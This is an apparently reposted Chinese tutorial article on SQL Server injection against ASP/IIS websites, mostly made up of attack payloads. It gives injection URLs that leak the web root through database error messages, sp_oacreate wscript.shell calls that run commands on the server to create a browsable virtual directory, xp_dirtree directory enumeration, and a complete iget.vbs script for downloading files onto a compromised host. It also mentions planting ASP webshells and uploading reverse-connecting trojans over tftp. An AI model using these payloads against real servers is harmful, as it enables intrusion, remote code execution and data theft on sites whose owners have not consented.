SQL Server注入的四种个人经验和技巧方法(3)

http://www.itjxue.com  2015-07-17 09:24  来源:未知  点击次数: 

IIS的默认路径的在注册表中HKEY_LOCAL_MACHINE\ SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\

利用爆字段将数据库的值读出来:

语句:http://www.xxx.com/list.asp?classid=1 and 0<>(select top 1 paths from newtable)--返回: Microsoft OLE DB Provider for

ODBC Drivers 错误 80040e07 [Microsoft][ODBC SQL Server Driver][SQL Server]将 varchar 值 E:\www,,201 转换为数据类型为 int 的

列时发生语法错误。

这说明网页目录在E:\www,接下来也可以利用FSO直接写入ASP木马

如果得不到网页目录,怎么办呢?前提你要猜到网站是否使用默认WEB,或者使用域名作为WEB。

declare @o int exec sp_oacreate wscript.shell , @o out exec sp_oamethod @o, run , NULL,’ cscript.exe c:

\inetpub\wwwroot\mkwebdir.vbs -w "默认 Web 站点" -v "e","e:\"’

在默认的WEB站点下创建一个虚拟目录E,指向E:盘下。

declare @o int exec sp_oacreate wscript.shell , @o out exec sp_oamethod @o, run , NULL,’ cscript.exe c:

\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e browse’

给虚拟目录e加上浏览属性不错吧。给自己开虚拟服务。想那些网页目录路径,头都快破了。这下给自己一个天开眼了。那传WEBSHELL利用MS

SQL为我们的工作告了一段落了,接下来工作应该由你来了。

哈哈,方法不错哟,通过注册表来读,方便快捷!

优缺点分析:

优点当然是方便快捷了。缺点是只能察看默认的iis站点的路径,如果不再默认的站点那就无能为力了(我用regsnape跟踪过),如果在2003下

那就是连默认的站点路径也不显示了!痛苦中

顺便说两句,

实际上除了找网站路径的方法外,还是有别的方法来继续入侵的,比如说通过tftp来上传反弹木马,或者是通过写一个iget.vbs来下载你想要的东东

iget.vbs代码如下:

---------start----------

Set xPost = createObject("Microsoft.XMLHTTP")

xPost.Open "GET",LCase(WScript.Arguments(0)),0

xPost.Send()

Set sGet = createObject("ADODB.Stream")

sGet.Mode = 3

sGet.Type = 1

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile LCase(WScript.Arguments(1)),2

----------end-----------

对此文的在补充

近日发现对毛主席大人的指示理解不够深刻,特在此表示补充

实际上上面的各种方法根本就不需要比较了xp_dirtree是最好的,只要这一种方法就够了

只是因为我当初太..............

今日将xp_dirtree的秘密再挖一下

好,我们exec master..xp_dirtree’d:/test’

假设我们在test里有两个文件夹test1和test2在test1里又有test3

结果显示

subdirectory depth

test1 1

test3 2

test2 1

哈哈发现没有那个depth就是目录的级数

ok了,知道怎么办了吧

http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--

http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ’d:\’ --

http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-

只要加上id=1,就是第一级目录 。

(责任编辑:IT教学网)

更多

推荐SQL Server文章